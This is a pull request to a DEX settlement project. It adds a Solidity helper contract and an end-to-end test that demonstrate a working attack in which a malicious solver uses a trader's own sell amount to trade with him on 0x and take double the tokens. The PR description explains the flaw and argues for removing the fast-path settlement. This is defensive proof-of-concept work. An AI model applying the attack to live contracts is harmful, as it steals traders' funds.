### PR TITLE
The Ballad of Market Maker Jim

### DIFF
--- a/src/contracts/test/EvilSolverBalance.sol
+++ b/src/contracts/test/EvilSolverBalance.sol
@@ -1,0 +1,28 @@
+// SPDX-License-Identifier: LGPL-3.0-or-later
+pragma solidity ^0.7.6;
+
+import "@openzeppelin/contracts/token/ERC20/IERC20.sol";
+import "../libraries/GPv2SafeERC20.sol";
+
+contract EvilSolverBalance {
+    using GPv2SafeERC20 for IERC20;
+
+    address public immutable evilSolver;
+
+    constructor(address evilSolver_) {
+        evilSolver = evilSolver_;
+    }
+
+    modifier onlyEvilSolver {
+        require(tx.origin == evilSolver, "not evil enough");
+        _;
+    }
+
+    function transferTo(
+        IERC20 token,
+        address to,
+        uint256 value
+    ) external onlyEvilSolver {
+        token.safeTransfer(to, value);
+    }
+}

--- a/test/e2e/mmJim.test.ts
+++ b/test/e2e/mmJim.test.ts
@@ -168,8 +168,6 @@ describe("E2E: The Ballad of Market Maker Jim", () => {
     expect(await gno.balanceOf(jim.address)).to.deep.equal(
       ethers.constants.Zero,
     );
-
-    // NOTE: The exchange keeps the surplus from the 0x order.
     expect(await gno.balanceOf(evilSolver.address)).to.deep.equal(
       jimOrder.gnoSellAmount.mul(2),
     );

--- a/test/e2e/mmJim.test.ts
+++ b/test/e2e/mmJim.test.ts
@@ -108,8 +108,8 @@ describe("E2E: The Ballad of Market Maker Jim", () => {
       .approve(zeroEx.erc20Proxy.address, ethers.constants.MaxUint256);
 
     // NOTE: Here, the evil solver is using its own OWL to trade with Jim on 0x.
-    // However, a slightly more sofisticated attack you use the GNO from Jim's
-    // GPv2 order to, say go to Uniswap to swap for owl. This way the evil
+    // However, a slightly more sophisticated attack you use the GNO from Jim's
+    // GPv2 order to, say, go to Uniswap to swap for owl. This way the evil
     // solver would only have to pay the spread + slippage in order to get one
     // free GNO from Jim.
     await owl.mint(evilSolverBalance.address, ethers.utils.parseEther("135.0"));

--- a/test/e2e/mmJim.test.ts
+++ b/test/e2e/mmJim.test.ts
@@ -1,0 +1,172 @@
+import ERC20 from "@openzeppelin/contracts/build/contracts/ERC20PresetMinterPauser.json";
+import { expect } from "chai";
+import { Contract, Wallet } from "ethers";
+import { ethers, waffle } from "hardhat";
+
+import {
+  OrderKind,
+  SettlementEncoder,
+  SigningScheme,
+  TypedDataDomain,
+  domain,
+} from "../../src/ts";
+
+import { deployTestContracts } from "./fixture";
+import * as ZeroExV2 from "./zero-ex/v2";
+
+describe.only("E2E: The Ballad of Market Maker Jim", () => {
+  let deployer: Wallet;
+  let evilSolver: Wallet;
+  let jim: Wallet;
+
+  let settlement: Contract;
+  let allowanceManager: Contract;
+  let domainSeparator: TypedDataDomain;
+
+  let owl: Contract;
+  let gno: Contract;
+  let evilSolverBalance: Contract;
+  let zeroEx: ZeroExV2.Deployment;
+
+  beforeEach(async () => {
+    const deployment = await deployTestContracts();
+
+    ({
+      deployer,
+      settlement,
+      allowanceManager,
+      wallets: [evilSolver, jim],
+    } = deployment);
+
+    const { authenticator, manager } = deployment;
+    await authenticator.connect(manager).addSolver(evilSolver.address);
+
+    const { chainId } = await ethers.provider.getNetwork();
+    domainSeparator = domain(chainId, settlement.address);
+
+    owl = await waffle.deployContract(deployer, ERC20, ["OWL", 18]);
+    gno = await waffle.deployContract(deployer, ERC20, ["GNO", 18]);
+
+    const EvilSolverBalance = await ethers.getContractFactory(
+      "EvilSolverBalance",
+    );
+    evilSolverBalance = await EvilSolverBalance.deploy(evilSolver.address);
+    zeroEx = await ZeroExV2.deployExchange(deployer);
+  });
+
+  it("should be very sad for Market Maker Jim", async () => {
+    // This is the Ballad of Market Maker Jim.
+    //
+    // Jim was a market maker. He loved making markets, specifically, making
+    // OWL-GNO markets. Jim, however, was ambitious and decided to integrate
+    // into as many DEXs as possible, including the awesome GPv2 and the less
+    // awesome 0x. What Jim didn't know was that an evil solver was plotting
+    // to take all his hard earned crypto-assets. Duh Duh DUUUH.
+    //
+    // The idea behind this attack is to leverage:
+    // - The fact that the balance check is not enough to guarantee that the
+    //   interaction is indeed just adding to it, or getting it from another
+    //   source
+    // - The order's sell amount gets transferred first
+    // - The order's sell amount can be used to trade with the trader himself
+    //   on other protocols.
+
+    // Jim and allows traders to get binding GPv2 and 0x orders for trading at
+    // the following price:
+    // - Sells 1 GNO for 135 OWL
+    const jimOrder = {
+      gnoSellAmount: ethers.utils.parseEther("1.0"),
+      owlBuyAmount: ethers.utils.parseEther("135.0"),
+    };
+
+    const gpv2Order = {
+      kind: OrderKind.SELL,
+      partiallyFillable: false,
+      sellToken: gno.address,
+      buyToken: owl.address,
+      sellAmount: jimOrder.gnoSellAmount,
+      buyAmount: jimOrder.owlBuyAmount,
+      feeAmount: ethers.constants.Zero,
+      validTo: 0xffffffff,
+      appData: 1,
+    };
+
+    const zeroExOrder = {
+      takerAddress: settlement.address,
+      makerAssetAddress: gno.address,
+      makerAssetAmount: jimOrder.gnoSellAmount,
+      takerAssetAddress: owl.address,
+      takerAssetAmount: jimOrder.owlBuyAmount,
+    };
+
+    await gno.mint(jim.address, jimOrder.gnoSellAmount.mul(2));
+    await gno
+      .connect(jim)
+      .approve(allowanceManager.address, ethers.constants.MaxUint256);
+    await gno
+      .connect(jim)
+      .approve(zeroEx.erc20Proxy.address, ethers.constants.MaxUint256);
+
+    await owl.mint(evilSolverBalance.address, ethers.utils.parseEther("135.0"));
+
+    const zeroExSignedOrder = await ZeroExV2.signSimpleOrder(
+      jim,
+      zeroEx.domainSeparator,
+      zeroExOrder,
+    );
+    const encoder = new SettlementEncoder(domainSeparator);
+    await encoder.signEncodeTrade(gpv2Order, jim, SigningScheme.EIP712);
+    encoder.encodeInteraction({
+      target: evilSolverBalance.address,
+      callData: evilSolverBalance.interface.encodeFunctionData("transferTo", [
+        owl.address,
+        settlement.address,
+        jimOrder.owlBuyAmount,
+      ]),
+    });
+    encoder.encodeInteraction({
+      target: owl.address,
+      callData: owl.interface.encodeFunctionData("approve", [
+        zeroEx.erc20Proxy.address,
+        jimOrder.owlBuyAmount,
+      ]),
+    });
+    encoder.encodeInteraction({
+      target: zeroEx.exchange.address,
+      callData: zeroEx.exchange.interface.encodeFunctionData("fillOrder", [
+        zeroExSignedOrder.order,
+        jimOrder.owlBuyAmount,
+        zeroExSignedOrder.signature,
+      ]),
+    });
+    encoder.encodeInteraction({
+      target: gno.address,
+      callData: gno.interface.encodeFunctionData("transfer", [
+        evilSolver.address,
+        jimOrder.gnoSellAmount,
+      ]),
+    });
+
+    await settlement.connect(evilSolver).settleSingleTrade(
+      ...encoder.encodeSingleTradeSettlement([
+        {
+          target: evilSolver.address,
+          amount: gpv2Order.sellAmount,
+        },
+      ]),
+    );
+
+    // NOTE: The evil solver got 2 GNO for the price of 1.
+    expect(await owl.balanceOf(jim.address)).to.deep.equal(
+      jimOrder.owlBuyAmount,
+    );
+    expect(await gno.balanceOf(jim.address)).to.deep.equal(
+      ethers.constants.Zero,
+    );
+
+    // NOTE: The exchange keeps the surplus from the 0x order.
+    expect(await gno.balanceOf(evilSolver.address)).to.deep.equal(
+      jimOrder.gnoSellAmount.mul(2),
+    );
+  });
+});

--- a/test/e2e/mmJim.test.ts
+++ b/test/e2e/mmJim.test.ts
@@ -14,7 +14,7 @@ import {
 import { deployTestContracts } from "./fixture";
 import * as ZeroExV2 from "./zero-ex/v2";
 
-describe.only("E2E: The Ballad of Market Maker Jim", () => {
+describe("E2E: The Ballad of Market Maker Jim", () => {
   let deployer: Wallet;
   let evilSolver: Wallet;
   let jim: Wallet;
@@ -107,6 +107,11 @@ describe.only("E2E: The Ballad of Market Maker Jim", () => {
       .connect(jim)
       .approve(zeroEx.erc20Proxy.address, ethers.constants.MaxUint256);
 
+    // NOTE: Here, the evil solver is using its own OWL to trade with Jim on 0x.
+    // However, a slightly more sofisticated attack you use the GNO from Jim's
+    // GPv2 order to, say go to Uniswap to swap for owl. This way the evil
+    // solver would only have to pay the spread + slippage in order to get one
+    // free GNO from Jim.
     await owl.mint(evilSolverBalance.address, ethers.utils.parseEther("135.0"));
 
     const zeroExSignedOrder = await ZeroExV2.signSimpleOrder(


### PR DESCRIPTION
This PR demonstrates an attack allowing solvers to access trader funds using the fast path. The idea behind the attack is to use the trader's own sell amount to trade with itself. Since only the balance is checked, there is nothing preventing the sell amount from being used to trade with himself on another on-chain protocol.

This attack doesn't work with the full settlement, which enforces that the full buy amount be sent from the settlement contract instead of just checking balanced.

I think this means that the "fast-path" settlement needs to be removed, as I don't see a way around this purely using balances. Even if we were to check the sell token's balance as well, this does not prevent Jim from MM on a completely different pair (say WETH-DAI) and the malicious solver doing a slightly more complicated attack where it converts the GNO into WETH on Uniswap, trades the converted with to DAI with Jim, and then converts the DAI to OWL to send to Jim.
